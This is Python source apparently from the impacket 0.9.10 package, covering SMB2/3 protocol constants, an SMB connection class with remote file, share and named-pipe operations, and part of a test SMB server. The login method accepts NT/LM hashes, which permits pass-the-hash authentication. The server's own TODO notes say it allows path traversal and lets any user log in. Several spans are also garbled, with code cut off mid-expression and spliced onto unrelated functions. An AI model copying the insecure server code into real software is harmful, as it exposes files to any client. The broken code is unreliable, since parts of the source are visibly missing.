FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004 FILE_NOTIFY_CHANGE_SIZE = 0x00000008 FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010 FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020 FILE_NOTIFY_CHANGE_CREATION = 0x00000040 FILE_NOTIFY_CHANGE_EA = 0x00000080 FILE_NOTIFY_CHANGE_SECURITY = 0x00000100 FILE_NOTIFY_CHANGE_STREAM_NAME = 0x00000200 FILE_NOTIFY_CHANGE_STREAM_SIZE = 0x00000400 FILE_NOTIFY_CHANGE_STREAM_WRITE = 0x00000800 # FILE_NOTIFY_INFORMATION # Actions FILE_ACTION_ADDED = 0x00000001 FILE_ACTION_REMOVED = 0x00000002 FILE_ACTION_MODIFIED = 0x00000003 FILE_ACTION_RENAMED_OLD_NAME = 0x00000004 FILE_ACTION_RENAMED_NEW_NAME = 0x00000005 # SMB2_QUERY_INFO # InfoTypes SMB2_0_INFO_FILE = 0x01 SMB2_0_INFO_FILESYSTEM = 0x02 SMB2_0_INFO_SECURITY = 0x03 SMB2_0_INFO_QUOTA = 0x04 # File Information Classes SMB2_FILE_ACCESS_INFO = 8 SMB2_FILE_ALIGNMENT_INFO = 17 SMB2_FILE_ALL_INFO = 18 SMB2_FILE_ALLOCATION_INFO = 19 SMB2_FILE_ALTERNATE_NAME_INFO = 21 SMB2_ATTRIBUTE_TAG_INFO = 35 SMB2_FILE_BASIC_INFO = 4 SMB2_FILE_BOTH_DIRECTORY_INFO = 3 SMB2_FILE_COMPRESSION_INFO = 28 SMB2_FILE_DIRECTORY_INFO = 1 SMB2_FILE_DISPOSITION_INFO = 13 SMB2_FILE_EA_INFO = 7 SMB2_FILE_END_OF_FILE_INFO = 20 SMB2_FULL_DIRECTORY_INFO = 2 SMB2_FULL_EA_INFO = 15 SMB2_FILE_HARDLINK_INFO = 46 SMB2_FILE_ID_BOTH_DIRECTORY_INFO = 37 SMB2_FILE_ID_FULL_DIRECTORY_INFO = 38 SMB2_FILE_ID_GLOBAL_TX_DIRECTORY_INFO = 50 SMB2_FILE_INTERNAL_INFO = 6 SMB2_FILE_LINK_INFO = 11 SMB2_FILE_MAILSLOT_QUERY_INFO = 26 SMB2_FILE_MAILSLOT_SET_INFO = 27 SMB2_FILE_MODE_INFO = 16 SMB2_FILE_MOVE_CLUSTER_INFO = 31 SMB2_FILE_NAME_INFO = 9 SMB2_FILE_NAMES_INFO = 12 SMB2_FILE_NETWORK_OPEN_INFO = 34 SMB2_FILE_NORMALIZED_NAME_INFO = 48 SMB2_FILE_OBJECT_ID_INFO = 29 SMB2_FILE_PIPE_INFO = 23 SMB2_FILE_PIPE_LOCAL_INFO = 24 SMB2_FILE_PIPE_REMOTE_INFO = 25 SMB2_FILE_POSITION_INFO = 14 SMB2_FILE_QUOTA_INFO = 32 SMB2_FILE_RENAME_INFO = 10 SMB2_FILE_REPARSE_POINT_INFO = 33 SMB2_FILE_SFIO_RESERVE_INFO = 44 SMB2_FILE_SHORT_NAME_INFO = 45 SMB2_FILE_STANDARD_INFO = 5 SMB2_FILE_STANDARD_LINK_INFO = 54 SMB2_FILE_STREAM_INFO = 22 SMB2_FILE_TRACKING_INFO = 36 SMB2_FILE_VALID_DATA_LENGTH_INFO = 39 # Additional information OWNER_SECURITY_INFORMATION = 0x00000001 GROUP_SECURITY_INFORMATION = 0x00000002 DACL_SECURITY_INFORMATION = 0x00000004 SACL_SECURITY_INFORMATION = 0x00000008 LABEL_SECURITY_INFORMATION = 0x00000010 # Flags SL_RESTART_SCAN = 0x00000001 SL_RETURN_SINGLE_ENTRY = 0x00000002 SL_INDEX_SPECIFIED = 0x00000004 # TRANSFORM_HEADER SMB2_ENCRYPTION_AES128_CCM = 0x0001 # STRUCtures # Represents a SMB2/3 Packet class SMBPacketBase(Structure): def addCommand(self,command): # Pad to 8 bytes and put the offset of another SMBPacket raise 'Implement This!' def isValidAnswer(self, status): if self['Status'] != status: import smb3 raise smb3.SessionError(self['Status'], self) return True def __init__(self, data = None): Structure.__init__(self,data) if data is None: self['TreeID'] = 0 class SMB2PacketAsync(SMBPacketBase): structure = ( ('ProtocolID','"\xfeSMB'), ('StructureSize',' -1: myName = myName[:i] # If port 445 and the name sent is *SMBSERVER we're setting the name to the IP. This is to help some old applications still believing # *SMSBSERVER will work against modern OSes. If port is NETBIOS_SESSION_PORT the user better know about *SMBSERVER's limitations if sess_port == 445 and remoteName == '*SMBSERVER': remoteName = remoteHost self._nmbSession = nmb.NetBIOSTCPSession(myName, remoteName, remoteHost, nmb.TYPE_SERVER, sess_port, timeout) smbp = smb.NewSMBPacket() negSession = smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE) if extended_security == True: smbp['Flags2']=smb.SMB.FLAGS2_EXTENDED_SECURITY negSession['Data'] = '\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00' smbp.addCommand(negSession) self._nmbSession.send_packet(str(smbp)) r = self._nmbSession.recv_packet(timeout) return r.get_trailer() def getSMBServer(self): """ returns the SMB/SMB3 instance being used. Useful for calling low level methods """ return self._SMBConnection def getDialect(self): return self._SMBConnection.getDialect() def getServerName(self): return self._SMBConnection.get_server_name() def getRemoteHost(self): return self._SMBConnection.get_remote_host() def getServerDomain(self): return self._SMBConnection.get_server_domain() def getServerOS(self): return self._SMBConnection.get_server_os() def doesSupportNTLMv2(self): return self._SMBConnection.doesSupportNTLMv2() def isLoginRequired(self): return self._SMBConnection.is_login_required() def login(self, user, password, domain = '', lmhash = '', nthash = ''): """ logins into the target system :param string user: username :param string password: password for the user :param string domain: domain where the account is valid for :param string lmhash: LMHASH used to authenticate using hashes (password is not used) :param string nthash: NTHASH used to authenticate using hashes (password is not used) :return: None, raises a Session Error if error. """ return self._SMBConnection.login(user, password, domain, lmhash, nthash) def isGuestSession(self): return self._SMBConnection.isGuestSession() def logoff(self): return self._SMBConnection.logoff() def connectTree(self,share): if self.getDialect() == smb.SMB_DIALECT: share = ntpath.basename(share) share = '\\\\' + self.getRemoteHost() + '\\' + share return self._SMBConnection.connect_tree(share) def disconnectTree(self, treeId): return self._SMBConnection.disconnect_tree(treeId) def listShares(self): # Get the shares through RPC from impacket.dcerpc import transport, dcerpc, srvsvc rpctransport = transport.SMBTransport(self.getRemoteHost(), self.getRemoteHost(), filename = r'\srvsvc', smb_connection = self) dce = dcerpc.DCERPC_v5(rpctransport) dce.connect() dce.bind(srvsvc.MSRPC_UUID_SRVSVC) srv_svc = srvsvc.DCERPCSrvSvc(dce) resp = srv_svc.get_share_enum_1(rpctransport.get_dip()) return resp def listPath(self, shareName, path, password = None): return self._SMBConnection.list_path(shareName, path, password) def createFile(self, treeId, pathName, desiredAccess = GENERIC_ALL, shareMode = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, creationOption = FILE_NON_DIRECTORY_FILE, creationDisposition = FILE_OVERWRITE_IF , fileAttributes = FILE_ATTRIBUTE_NORMAL, impersonationLevel = SMB2_IL_IMPERSONATION, securityFlags = 0, oplockLevel = SMB2_OPLOCK_LEVEL_NONE, createContexts = None): """ creates a remote file :param HANDLE treeId: a valid handle for the share where the file is to be opened :param string pathName: the path name to open :return: a valid file descriptor, if not raises a SessionError exception. """ if self.getDialect() == smb.SMB_DIALECT: pathName = string.replace(pathName, '/', '\\') ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters() ntCreate['Data'] = smb.SMBNtCreateAndX_Data() ntCreate['Parameters']['FileNameLength']= len(pathName) ntCreate['Parameters']['AccessMask'] = desiredAccess ntCreate['Parameters']['FileAttributes']= fileAttributes ntCreate['Parameters']['ShareAccess'] = shareMode ntCreate['Parameters']['Disposition'] = creationDisposition ntCreate['Parameters']['CreateOptions'] = creationOption ntCreate['Parameters']['Impersonation'] = impersonationLevel ntCreate['Parameters']['SecurityFlags'] = securityFlags ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Data']['FileName'] = pathName if createContexts is not None: print "CreateContexts not supported in SMB1" return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate) else: return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption, creationDisposition, fileAttributes, impersonationLevel, securityFlags, oplockLevel, createContexts) def openFile(self, treeId, pathName, desiredAccess = FILE_READ_DATA | FILE_WRITE_DATA, shareMode = FILE_SHARE_READ, creationOption = FILE_NON_DIRECTORY_FILE, creationDisposition = FILE_OPEN, fileAttributes = FILE_ATTRIBUTE_NORMAL, impersonationLevel = SMB2_IL_IMPERSONATION, securityFlags = 0, oplockLevel = SMB2_OPLOCK_LEVEL_NONE, createContexts = None): """ opens a remote file :param HANDLE treeId: a valid handle for the share where the file is to be opened :param string pathName: the path name to open :return: a valid file descriptor, if not raises a SessionError exception. """ if self.getDialect() == smb.SMB_DIALECT: pathName = string.replace(pathName, '/', '\\') ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters() ntCreate['Data'] = smb.SMBNtCreateAndX_Data() ntCreate['Parameters']['FileNameLength']= len(pathName) ntCreate['Parameters']['AccessMask'] = desiredAccess ntCreate['Parameters']['FileAttributes']= fileAttributes ntCreate['Parameters']['ShareAccess'] = shareMode ntCreate['Parameters']['Disposition'] = creationDisposition ntCreate['Parameters']['CreateOptions'] = creationOption ntCreate['Parameters']['Impersonation'] = impersonationLevel ntCreate['Parameters']['SecurityFlags'] = securityFlags ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Data']['FileName'] = pathName if createContexts is not None: print "CreateContexts not supported in SMB1" return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate) else: return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption, creationDisposition, fileAttributes, impersonationLevel, securityFlags, oplockLevel, createContexts) def writeFile(self, treeId, fileId, data, offset=0): """ writes data to a file :param HANDLE treeId: a valid handle for the share where the file is to be opened :param HANDLE fileId: a valid handle for the file/directory to be closed :param string data: buffer with the data to write :param integer offset: offset where to start writing the data :return: amount of bytes written, if not raises a SessionError exception. """ return self._SMBConnection.writeFile(treeId, fileId, data, offset) def readFile(self, treeId, fileId, offset = 0, bytesToRead = None): """ reads data from a file :param HANDLE treeId: a valid handle for the share where the file is to be opened :param HANDLE fileId: a valid handle for the file/directory to be closed :param integer offset: offset where to start writing the data :param integer bytesToRead: amount of bytes to read. If None, it will read Dialect['MaxBufferSize'] bytes. :return: the data read, if not raises a SessionError exception. """ return self._SMBConnection.read_andx(treeId, fileId, offset, bytesToRead) def closeFile(self, treeId, fileId): """ closes a file handle :param HANDLE treeId: a valid handle for the share where the file is to be opened :param HANDLE fileId: a valid handle for the file/directory to be closed :return: None, raises a SessionError exception if error. """ return self._SMBConnection.close(treeId, fileId) def deleteFile(self, shareName, pathName): """ removes a file :param string shareName: a valid handle for the share where the file is to be opened :param string pathName: the path name to remove :return: None, raises a SessionError exception if error. """ return self._SMBConnection.remove(shareName, pathName) def createDirectory(self, shareName, pathName ): """ creates a directory :param string shareName: a valid handle for the share where the file is to be opened :param string pathName: the path name or the directory to create :return: None, raises a SessionError exception if error. """ return self._SMBConnection.mkdir(shareName, pathName) def deleteDirectory(self, shareName, pathName): """ deletes a directory :param string shareName: a valid handle for the share where the file is to be opened :param string pathName: the path name or the directory to delete :return: None, raises a SessionError exception if error. """ return self._SMBConnection.rmdir(shareName, pathName) def waitNamedPipe(self, treeId, pipeName, timeout = 5): """ waits for a named pipe :param HANDLE treeId: a valid handle for the share where the file is to be checked :param string pipeName: the pipe name to check :param integer timeout: time to wait for an answer :return: None, raises a SessionError exception if error. """ return self._SMBConnection.waitNamedPipe(treeId, pipeName, timeout = timeout) def transactNamedPipe(self, treeId, fileId, data, waitAnswer = True): """ writes to a named pipe using a transaction command :param HANDLE treeId: a valid handle for the share where the file is to be checked :param HANDLE fileId: a valid handle for the file/directory to be closed :param string data: buffer with the data to write :param boolean waitAnswer: whether or not to wait for an answer :return: None, raises a SessionError exception if error. """ return self._SMBConnection.TransactNamedPipe(treeId, fileId, data, waitAnswer = waitAnswer) def transactNamedPipeRecv(self): """ reads from a named pipe using a transaction command :return: data read, raises a SessionError exception if error. """ return self._SMBConnection.TransactNamedPipeRecv() def writeNamedPipe(self, treeId, fileId, data, waitAnswer = True): """ writes to a named pipe :param HANDLE treeId: a valid handle for the share where the file is to be checked :param HANDLE fileId: a valid handle for the file/directory to be closed :param string data: buffer with the data to write :param boolean waitAnswer: whether or not to wait for an answer :return: None, raises a SessionError exception if error. """ if self.getDialect() == smb.SMB_DIALECT: return self._SMBConnection.write_andx(treeId, fileId, data, wait_answer = waitAnswer, write_pipe_mode = True) else: return self.writeFile(treeId, fileId, data, 0) def readNamedPipe(self,treeId, fileId, bytesToRead = None ): """ read from a named pipe :param HANDLE treeId: a valid handle for the share where the file is to be checked :param HANDLE fileId: a valid handle for the file/directory to be closed :param integer bytestToRead: amount of data to read :param boolean waitAnswer: whether or not to wait for an answer :return: None, raises a SessionError exception if error. """ return self.readFile(treeId, fileId, bytesToRead = bytesToRead) def getFile(self, shareName, pathName, callback): """ downloads a file :param string shareName: a valid handle for the share where the file is to be opened :param string pathName: the path name or the directory to delete :param callback callback: :return: None, raises a SessionError exception if error. """ return self._SMBConnection.retr_file(shareName, pathName, callback) def putFile(self, shareName, pathName, callback): """ uploads a file :param string shareName: a valid handle for the share where the file is to be opened :param string pathName: the path name or the directory to delete :param callback callback: :return: None, raises a SessionError exception if error. """ return self._SMBConnection.stor_file(shareName, pathName, callback) def rename(self, shareName, oldPath, newPath): """ rename a file/directory :param string shareName: a valid handle for the share where the file is to be opened :param string oldPath: the old path name or the directory/file to rename :param string newPath: the new path name or the directory/file to rename :return: True, raises a SessionError exception if error. """ return self._SMBConnection.rename(shareName, oldPath, newPath) def setTimeout(self, timeout): return self._SMBConnection.set_timeout(timeout) impacket-0.9.10/impacket/smbserver.py0000700000076500000240000037425512141750575017651 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies) # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smbserver.py 735 2012-12-30 16:31:08Z bethus@gmail.com $ # # Author: Alberto Solino # TODO: # [-] Functions should return NT error codes # [-] Handling errors in all situations, right now it's just raising exceptions. # [*] Standard authentication support # [ ] Organize the connectionData stuff # [*] Add capability to send a bad user ID if the user is not authenticated, # right now you can ask for any command without actually being authenticated # [ ] PATH TRAVERSALS EVERYWHERE.. BE WARNED! # [ ] Check the credentials.. now we're just letting everybody to log in. # [ ] Check error situation (now many places assume the right data is coming) # [ ] Implement IPC to the main process so the connectionData is on a single place # [ ] Hence.. implement locking # estamos en la B from impacket import smb from impacket import nmb from impacket import ntlm from impacket.spnego import * from structure import Structure import traceback import sys import calendar import socket import time import datetime import struct import ConfigParser import SocketServer import threading import logging import logging.config import ntpath import os import fnmatch import errno import sys # For signing import hashlib # Utility functions # and general functions. # There are some common functions that can be accessed from more than one SMB # command (or either TRANSACTION). That's why I'm putting them here # TODO: Return NT ERROR Codes def decodeSMBString( flags, text ): if flags & smb.SMB.FLAGS2_UNICODE: return text.decode('utf-16le') else: return text def encodeSMBString( flags, text ): if flags & smb.SMB.FLAGS2_UNICODE: return (text).encode('utf-16le') else: return text def getFileTime(t): t *= 10000000 t += 116444736000000000 return t def getUnixTime(t): t -= 116444736000000000 t /= 10000000 return t def getSMBDate(t): # TODO: Fix this :P d = datetime.date.fromtimestamp(t) year = d.year - 1980 ret = (year << 8) + (d.month << 4) + d.day return ret def getSMBTime(t): # TODO: Fix this :P d = datetime.datetime.fromtimestamp(t) return (d.hour << 8) + (d.minute << 4) + d.second def getShares(connId, smbServer): config = smbServer.getServerConfig() sections = config.sections() # Remove the global one del(sections[sections.index('global')]) shares = {} for i in sections: shares[i] = dict(config.items(i)) return shares def searchShare(connId, share, smbServer): config = smbServer.getServerConfig() if config.has_section(share): return dict(config.items(share)) else: return None def openFile(path,fileName, accessMode, fileAttributes, openMode): fileName = os.path.normpath(fileName.replace('\\','/')) errorCode = 0 if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) mode = 0 # Check the Open Mode if openMode & 0x10: # If the file does not exist, create it. mode = os.O_CREAT else: # If file does not exist, return an error if os.path.exists(pathName) is not True: errorCode = STATUS_NO_SUCH_FILE return 0,mode, pathName, errorCode if os.path.isdir(pathName) and (fileAttributes & smb.ATTR_DIRECTORY) == 0: # Request to open a normal file and this is actually a directory errorCode = STATUS_FILE_IS_A_DIRECTORY return 0, mode, pathName, errorCode # Check the Access Mode if accessMode & 0x7 == 1: mode |= os.O_WRONLY elif accessMode & 0x7 == 2: mode |= os.O_RDWR else: mode = os.O_RDONLY try: if sys.platform == 'win32': mode |= os.O_BINARY fid = os.open(pathName, mode) except Exception, e: print "openFile: %s,%s" % (pathName, mode) ,e fid = 0 errorCode = STATUS_ACCESS_DENIED return fid, mode, pathName, errorCode def queryFsInformation(path, filename, level=0): if isinstance(filename,unicode): encoding = 'utf-16le' flags = smb.SMB.FLAGS2_UNICODE else: encoding = 'ascii' flags = 0 fileName = os.path.normpath(filename.replace('\\','/')) if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) fileSize = os.path.getsize(pathName) (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(pathName) if level == smb.SMB_QUERY_FS_ATTRIBUTE_INFO: data = smb.SMBQueryFsAttributeInfo() data['FileSystemAttributes'] = smb.FILE_CASE_SENSITIVE_SEARCH | smb.FILE_CASE_PRESERVED_NAMES data['MaxFilenNameLengthInBytes'] = 255 data['LengthOfFileSystemName'] = len('XTFS')*2 data['FileSystemName'] = 'XTFS'.encode('utf-16le') return data.getData() elif level == smb.SMB_INFO_VOLUME: data = smb.SMBQueryFsInfoVolume( flags = flags ) data['VolumeLabel'] = 'SHARE'.encode(encoding) return data.getData() elif level == smb.SMB_QUERY_FS_VOLUME_INFO: data = smb.SMBQueryFsVolumeInfo() data['VolumeLabel'] = 'SHARE'.encode('utf-16le') data['VolumeCreationTime'] = getFileTime(ctime) return data.getData() elif level == smb.SMB_QUERY_FS_SIZE_INFO: data = smb.SMBQueryFsSizeInfo() return data.getData() else: lastWriteTime = mtime attribs = 0 if os.path.isdir(pathName): attribs |= smb.SMB_FILE_ATTRIBUTE_DIRECORY if os.path.isfile(pathName): attribs |= smb.SMB_FILE_ATTRIBUTE_NORMAL fileAttributes = attribs return fileSize, lastWriteTime, fileAttributes def findFirst2(path, fileName, level, searchAttributes): # TODO: Depending on the level, this could be done much simpler #print "FindFirs2 path:%s, filename:%s" % (path, fileName) fileName = os.path.normpath(fileName.replace('\\','/')) # Let's choose the right encoding depending on the request if isinstance(fileName,unicode): encoding = 'utf-16le' flags = smb.SMB.FLAGS2_UNICODE else: encoding = 'ascii' flags = 0 if len(fileName) > 0: # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) files = [] if pathName.find('*') == -1 and pathName.find('?') == -1: # No search patterns pattern = '' else: pattern = os.path.basename(pathName) dirName = os.path.dirname(pathName) # Always add . and .. Not that important for Windows, but Samba whines if # not present (for * search only) if pattern == '*': files.append(os.path.join(dirName,'.')) files.append(os.path.join(dirName,'..')) if pattern != '': for file in os.listdir(dirName): if fnmatch.fnmatch(file.lower(),pattern.lower()): entry = os.path.join(dirName, file) if os.path.isdir(entry): if searchAttributes & smb.ATTR_DIRECTORY: files.append(entry) else: files.append(entry) else: if os.path.exists(pathName): files.append(pathName) searchResult = [] searchCount = len(files) errorCode = STATUS_SUCCESS eaErrorOffset = 0 for i in files: if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO: item = smb.SMBFindFileBothDirectoryInfo( flags = flags ) elif level == smb.SMB_FIND_FILE_DIRECTORY_INFO: item = smb.SMBFindFileDirectoryInfo( flags = flags ) elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO: item = smb.SMBFindFileFullDirectoryInfo( flags = flags ) elif level == smb.SMB_FIND_INFO_STANDARD: item = smb.SMBFindInfoStandard( flags = flags ) elif level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO: item = smb.SMBFindFileIdFullDirectoryInfo( flags = flags ) elif level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO: item = smb.SMBFindFileIdBothDirectoryInfo( flags = flags ) elif level == smb.SMB_FIND_FILE_NAMES_INFO: item = smb.SMBFindFileNamesInfo( flags = flags ) else: print "Wrong level %d!" % level (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(i) if os.path.isdir(i): item['ExtFileAttributes'] = smb.ATTR_DIRECTORY else: item['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE item['FileName'] = os.path.basename(i).encode(encoding) if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO: item['EaSize'] = 0 item['EndOfFile'] = size item['AllocationSize'] = size item['CreationTime'] = getFileTime(ctime) item['LastAccessTime'] = getFileTime(atime) item['LastWriteTime'] = getFileTime(mtime) item['LastChangeTime'] = getFileTime(mtime) item['ShortName'] = '\x00'*24 item['FileName'] = os.path.basename(i).encode(encoding) item['NextEntryOffset'] = len(item) elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO: item['EaSize'] = 0 item['EndOfFile'] = size item['AllocationSize'] = size item['CreationTime'] = getFileTime(ctime) item['LastAccessTime'] = getFileTime(atime) item['LastWriteTime'] = getFileTime(mtime) item['LastChangeTime'] = getFileTime(mtime) item['NextEntryOffset'] = len(item) elif level == smb.SMB_FIND_INFO_STANDARD: item['EaSize'] = size item['CreationDate'] = getSMBDate(ctime) item['CreationTime'] = getSMBTime(ctime) item['LastAccessDate'] = getSMBDate(atime) item['LastAccessTime'] = getSMBTime(atime) item['LastWriteDate'] = getSMBDate(mtime) item['LastWriteTime'] = getSMBTime(mtime) searchResult.append(item) # No more files if level >= smb.SMB_FIND_FILE_DIRECTORY_INFO and searchCount > 0: searchResult[-1]['NextEntryOffset'] = 0 return searchResult, searchCount, errorCode def queryFileInformation(path, filename, level): #print "queryFileInfo path: %s, filename: %s, level:0x%x" % (path,filename,level) return queryPathInformation(path,filename, level) def queryPathInformation(path, filename, level): # TODO: Depending on the level, this could be done much simpler #print "queryPathInfo path: %s, filename: %s, level:0x%x" % (path,filename,level) try: errorCode = 0 fileName = os.path.normpath(filename.replace('\\','/')) if len(fileName) > 0 and path != '': # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) if os.path.exists(pathName): (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(pathName) if level == smb.SMB_QUERY_FILE_BASIC_INFO: infoRecord = smb.SMBQueryFileBasicInfo() infoRecord['CreationTime'] = getFileTime(ctime) infoRecord['LastAccessTime'] = getFileTime(atime) infoRecord['LastWriteTime'] = getFileTime(mtime) infoRecord['LastChangeTime'] = getFileTime(mtime) if os.path.isdir(pathName): infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY else: infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL elif level == smb.SMB_QUERY_FILE_STANDARD_INFO: infoRecord = smb.SMBQueryFileStandardInfo() infoRecord['AllocationSize'] = size infoRecord['EndOfFile'] = size if os.path.isdir(pathName): infoRecord['Directory'] = 1 else: infoRecord['Directory'] = 0 elif level == smb.SMB_QUERY_FILE_ALL_INFO: infoRecord = smb.SMBQueryFileAllInfo() infoRecord['CreationTime'] = getFileTime(ctime) infoRecord['LastAccessTime'] = getFileTime(atime) infoRecord['LastWriteTime'] = getFileTime(mtime) infoRecord['LastChangeTime'] = getFileTime(mtime) if os.path.isdir(pathName): infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY else: infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL infoRecord['AllocationSize'] = size infoRecord['EndOfFile'] = size if os.path.isdir(pathName): infoRecord['Directory'] = 1 else: infoRecord['Directory'] = 0 infoRecord['FileName'] = filename.encode('utf-16le') elif level == smb.SMB_QUERY_FILE_EA_INFO: infoRecord = smb.SMBQueryFileEaInfo() else: print 'Unknown level for query path info! 0x%x' % level # UNSUPPORTED return None, STATUS_NOT_SUPPORTED return infoRecord, errorCode else: # NOT FOUND return None, STATUS_OBJECT_NAME_NOT_FOUND except Exception, e: print 'queryPathInfo: %s' % e raise def queryDiskInformation(path): # TODO: Do something useful here :) # For now we just return fake values totalUnits = 65535 freeUnits = 65535 return totalUnits, freeUnits # Here we implement the NT transaction handlers class NTTRANSCommands(): def default(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): pass # Here we implement the NT transaction handlers class TRANSCommands(): def lanMan(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): # Minimal [MS-RAP] implementation, just to return the shares connData = smbServer.getConnectionData(connId) respSetup = '' respParameters = '' respData = '' errorCode = STATUS_SUCCESS if struct.unpack(' 0 and path != '': # strip leading '/' fileName = fileName[1:] pathName = os.path.join(path,fileName) if os.path.exists(pathName): informationLevel = setPathInfoParameters['InformationLevel'] if informationLevel == smb.SMB_SET_FILE_BASIC_INFO: infoRecord = smb.SMBSetFileBasicInfo(data) # Creation time won't be set, the other ones we play with. atime = infoRecord['LastAccessTime'] if atime == 0: atime = -1 else: atime = getUnixTime(atime) mtime = infoRecord['LastWriteTime'] if mtime == 0: mtime = -1 else: mtime = getUnixTime(mtime) if mtime != -1 or atime != -1: os.utime(pathName,(atime,mtime)) else: smbServer.log('Unknown level for set path info! 0x%x' % setPathInfoParameters['InformationLevel'], logging.ERROR) # UNSUPPORTED errorCode = STATUS_NOT_SUPPORTED else: errorCode = STATUS_OBJECT_NAME_NOT_FOUND if errorCode == STATUS_SUCCESS: respParameters = smb.SMBSetPathInformationResponse_Parameters() else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def setFileInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): connData = smbServer.getConnectionData(connId) respSetup = '' respParameters = '' respData = '' errorCode = STATUS_SUCCESS setFileInfoParameters = smb.SMBSetFileInformation_Parameters(parameters) if connData['ConnectedShares'].has_key(recvPacket['Tid']): if connData['OpenedFiles'].has_key(setFileInfoParameters['FID']): fileName = connData['OpenedFiles'][setFileInfoParameters['FID']]['FileName'] informationLevel = setFileInfoParameters['InformationLevel'] if informationLevel == smb.SMB_SET_FILE_DISPOSITION_INFO: infoRecord = smb.SMBSetFileDispositionInfo(parameters) if infoRecord['DeletePending'] > 0: # Mark this file for removal after closed connData['OpenedFiles'][setFileInfoParameters['FID']]['DeleteOnClose'] = True respParameters = smb.SMBSetFileInformationResponse_Parameters() elif informationLevel == smb.SMB_SET_FILE_BASIC_INFO: infoRecord = smb.SMBSetFileBasicInfo(data) # Creation time won't be set, the other ones we play with. atime = infoRecord['LastAccessTime'] if atime == 0: atime = -1 else: atime = getUnixTime(atime) mtime = infoRecord['LastWriteTime'] if mtime == 0: mtime = -1 else: mtime = getUnixTime(mtime) os.utime(fileName,(atime,mtime)) elif informationLevel == smb.SMB_SET_FILE_END_OF_FILE_INFO: # We do nothing here, end of file will be set alone infoRecord = smb.SMBSetFileEndOfFileInfo(data) else: smbServer.log('Unknown level for set file info! 0x%x' % setFileInfoParameters['InformationLevel'], logging.ERROR) # UNSUPPORTED errorCode = STATUS_NOT_SUPPORTED else: errorCode = STATUS_NO_SUCH_FILE if errorCode == STATUS_SUCCESS: respParameters = smb.SMBSetFileInformationResponse_Parameters() else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def queryFileInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): connData = smbServer.getConnectionData(connId) respSetup = '' respParameters = '' respData = '' errorCode = STATUS_SUCCESS queryFileInfoParameters = smb.SMBQueryFileInformation_Parameters(parameters) if len(data) > 0: queryFileInfoData = smb.SMBQueryFileInformation_Data(data) if connData['ConnectedShares'].has_key(recvPacket['Tid']): path = connData['ConnectedShares'][recvPacket['Tid']]['path'] if connData['OpenedFiles'].has_key(queryFileInfoParameters['FID']): fileName = connData['OpenedFiles'][queryFileInfoParameters['FID']]['FileName'] infoRecord, errorCode = queryFileInformation('', fileName, queryFileInfoParameters['InformationLevel']) if infoRecord is not None: respParameters = smb.SMBQueryFileInformationResponse_Parameters() respData = infoRecord else: errorCode = STATUS_INVALID_HANDLE else: errorCode = STATUS_SMB_BAD_TID smbServer.setConnectionData(connId, connData) return respSetup, respParameters, respData, errorCode def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0): connData = smbServer.getConnectionData(connId) respSetup = '' respParameters = '' respData = '' errorCode = 0 queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters) if len(data) > 0: queryPathInfoData = smb.SMBQueryPathInformation_Data(data) if connData['ConnectedShares'].has_key(recvPacket['Tid']): path = connData['ConnectedShares'][recvPacket['Tid']]['path'] try: infoRecord, errorCode = queryPathInformation(path, decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName']), queryPathInfoParameters['InformationLevel']) except Exception, e: smbServer.log("queryPathInformation: %s" % e,logging.ERROR) if infoRecord is not None: respParameters = smb.SMBQueryPathInformationResponse_Parameters() respData = infoRecord else: errorCode = STATUS_SMB_BAD_TID 